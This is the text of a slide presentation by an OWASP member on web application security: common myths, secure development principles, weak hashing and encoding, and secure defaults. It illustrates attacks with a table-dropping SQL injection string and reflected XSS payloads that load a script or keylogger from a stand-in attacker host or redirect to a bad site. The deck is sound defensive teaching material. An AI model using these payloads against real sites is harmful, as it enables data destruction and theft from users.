How to secure web applications

The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards“

”- Gene Spafford

SECURING WEB APPLICATIONS

ofA BIRD'S EYE VIEW

Hello Everyone

# Security Researcher # Null Hyd Moderator # OWASP Hyd Board Member @imran_naseem

Imran Mohammed

Do you know ?

90% of companiesgot hacked last year

http://www.computerworld.com/s/article/9217853/90_of_companies_say_they_ve_been_hacked_Survey

To name few ...

got hacked twice60%

50% are unsure about this year

Myths of App Sec

Myth #1

We have network firewall & WAF

Myth #2

We have SSL hence we are secure

Myth #3

Testing team will handle security

Myth #4

Nobody will attack us, we are a small organization

If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology“

”- Bruce Schneier

Ten commandments of secure development

Input is evil, validate it

Validate input source, context, syntax and semantics of data, current and previous states

SQL Injection

Front-end: https://bookstore.com/index.php?authorname=James

Back-end: SELECT title,year FROM books WHERE author = ‘James’

SQL Injection

Front-end: https://bookstore.com/index.php?authorname=James’; drop table books;––

Back-end: SELECT title,year FROM books WHERE author = 'James’; drop table books;–– '

Cross Site ScriptingFunctionality: 

https://example.com/error.php?message=Sorry%2c+an +error+occurred

“Reflected” back to the client via webserver: 

<p>Sorry, an error occurred.</p>

Any Problem ?

https://example.com/error.php?message=[can i change this ?]

Cross Site ScriptingAttack Users: 

https://example.com/error.php?message=<script src=”attacker.com/malicious.js”></script>

“Reflected” back to the client via webserver:  <p><script src=”attacker.com/malicious.js”></script>.</p>

More problems

https://example.com/error.php?message=

<script src=”attacker.com/keylogger.js”></script>

https://example.com/error.php?message=

<script>document.location.href=”badsite.com”</script>

POST /books/user1/search.asp HTTP/1.1

Accept: image/gif, image/xxbitmap, image/jpeg, image/pjpeg, application/xshockwaveflash, application/vnd.msexcel,

Accept-Language: en-gb,en-us;

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Cookie: PHPSESSIONID=24c9e15e52afc47c225b757e7bee1f9d

Host: www.example.com

q=sqli

hidden_field=20

Check this

Check this

Check this

Check this

Use cryptographically strong algorithms

Cookie: lang=english; sessionid=aW1yYW4=

Cookie: lang=english; sessionid=cmFnaHU=

Base 64 is not encryption

http://www.example.com/salary/view/8635f8ebae3017a5581dbeba572eb01a

MD5 is not good enough

Google it

Use SHA2 or better with salt

Minimize attack surface

Use Least privilege

Keep security simple

Keep design as simple and small as possible. Complex design is difficult to understand and secure.

Provide Defense in depth

Fail safelyisAdmin = true;

try {

codeWhichMayFail();

isAdmin = isUserInRole( “Administrator” );

}

catch (Exception ex) {

log.write(ex.toString());

}

Avoid Security through obscurity

Cookie: lang=english; ADMIN=no; sessionid=yj3735mmhdABC

Cookie: lang=english; ADMIN=yes; sessionid=yj3735mmhdABC

Fix Security issues correctly

Use Secure defaults

Remember scott/tiger ?

andAdmin/password ( router's admin panel )

Dont reinvent the wheeel

How to do develop/fix the code securely ?

Follow Secure SDLC

OWASP Development Guide

Educate Developers/Users

Use OWASP ESAPI

Typical OWASP ESAPI Example

Thanks !

Questions ?

CreditsAll icons are taken from the noun project

OWASP Project related Images are taken from owasp.org